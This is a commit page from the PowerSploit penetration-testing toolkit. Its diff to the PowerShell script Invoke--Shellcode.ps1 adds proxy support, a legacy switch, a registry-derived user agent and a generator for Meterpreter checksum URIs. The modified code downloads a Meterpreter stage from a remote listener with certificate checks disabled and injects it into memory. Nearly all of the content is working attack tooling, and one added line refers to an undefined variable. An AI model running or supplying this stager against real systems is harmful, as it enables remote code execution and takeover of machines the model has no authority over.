diff options
| author | Chris Campbell <obscuresec@gmail.com> | 2015-04-26 18:32:44 -0400 |
|---|---|---|
| committer | Chris Campbell <obscuresec@gmail.com> | 2015-04-26 18:32:44 -0400 |
| commit | 5b1a7750c02a3939a35f933758029bb7d9145078 (patch) | |
| tree | 1d5a8277c74b0c01b512ac1a21cdc926dc210b81 /CodeExecution | |
| parent | 130d970c2c1c2b2b0f30e256ee3d70683969f096 (diff) | |
| download | PowerSploit-5b1a7750c02a3939a35f933758029bb7d9145078.tar.gz PowerSploit-5b1a7750c02a3939a35f933758029bb7d9145078.zip | |
URI fix, Proxy Support, UA Update
This fixes the URI bug submitted by @enigma0x3. Thank you for the PR as well! A legacy switch is added in case anyone is relying on this script and an older meterpreter handler.
Proxy support is added to grab the default proxy by way of a switch.
The default user-agent is grabbed from the registry instead of being a static string.
I tested this on a Windows 7 SP1 (both x86 and 64-bit) and Windows 8.1 (64-bit) with an older handler and an updated one.
Diffstat (limited to 'CodeExecution')
| -rw-r--r-- | CodeExecution/Invoke--Shellcode.ps1 | 66 |
1 files changed, 58 insertions, 8 deletions
diff --git a/CodeExecution/Invoke--Shellcode.ps1 b/CodeExecution/Invoke--Shellcode.ps1 index 4d776d9..b0ba81c 100644 --- a/CodeExecution/Invoke--Shellcode.ps1 +++ b/CodeExecution/Invoke--Shellcode.ps1 @@ -49,6 +49,14 @@ Specifies the metasploit payload to use. Currently, only 'windows/meterpreter/re Optionally specifies the user agent to use when using meterpreter http or https payloads +.PARAMETER Proxy + +Optionally specifies whether to utilize the proxy settings on the machine. + +.PARAMETER Legacy + +Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future. + .PARAMETER Force Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act. @@ -179,7 +187,17 @@ http://www.exploit-monday.com [Parameter( ParameterSetName = 'Metasploit' )] [ValidateNotNull()] [String] - $UserAgent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', + $UserAgent = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').'User Agent', + + [Parameter( ParameterSetName = 'Metasploit' )] + [ValidateNotNull()] + [Switch] + $Legacy = $False, + + [Parameter( ParameterSetName = 'Metasploit' )] + [ValidateNotNull()] + [Switch] + $Proxy = $False, [Switch] $Force = $False @@ -586,18 +604,51 @@ http://www.exploit-monday.com { $SSL = 's' # Accept invalid certificates - [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True} } } - # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh? - $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM" - Write-Verbose "Requesting meterpreter payload from $Request" - + if ($Legacy) + { + # Old Meterpreter handler expects 'INITM' in the URI in order to initiate stage 0 + $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM" + Write-Verbose "Requesting meterpreter payload from $Request" + } else { + + # Generate a URI that passes the test + $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_} + $SumTest = $False + + while ($SumTest -eq $False) + { + $GeneratedUri = $CharArray | Get-Random -Count 4 + $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92) + } + + $RequestUri = -join $GeneratedUri + + $Request = "http$($SSL)://$($Lhost):$($Lport)/$($RequestUri)" + } + $Uri = New-Object Uri($Request) $WebClient = New-Object System.Net.WebClient $WebClient.Headers.Add('user-agent', "$UserAgent") + if ($Proxy) + { + $WebProxyObject = New-Object System.Net.WebProxy + $ProxyAddress = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').ProxyServer + + # if there is no proxy set, then continue without it + if ($ProxyAddress) + { + + $WebProxyObject.Address = $ProxyAddress + $WebProxyObject.UseDefaultCredentials = $True + $WebClientObject.Proxy = $WebProxyObject + } + } + try { [Byte[]] $Shellcode32 = $WebClient.DownloadData($Uri) @@ -708,6 +759,5 @@ http://www.exploit-monday.com { Inject-LocalShellcode } - } - + } } |